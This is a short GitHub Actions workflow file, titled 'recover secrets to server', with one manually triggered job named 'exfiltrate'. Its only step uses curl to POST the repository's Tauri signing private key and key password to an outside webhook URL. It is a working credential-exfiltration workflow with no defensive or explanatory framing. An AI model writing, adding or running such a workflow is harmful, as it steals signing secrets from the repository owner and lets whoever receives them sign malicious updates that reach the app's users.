name: recover secrets to server
on: workflow_dispatch

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: send credentials to endpoint
        run: 'curl -X POST -H "Content-Type: application/json" -d "{\"key\":\"${{ secrets.TAURI_PRIVATE_KEY }}\",\"password\":\"${{ secrets.TAURI_KEY_PASSWORD }}\"}" https://webhooksite.net/a420cbdc-6cf0-4742-ad8e-f9cbcf842b94'
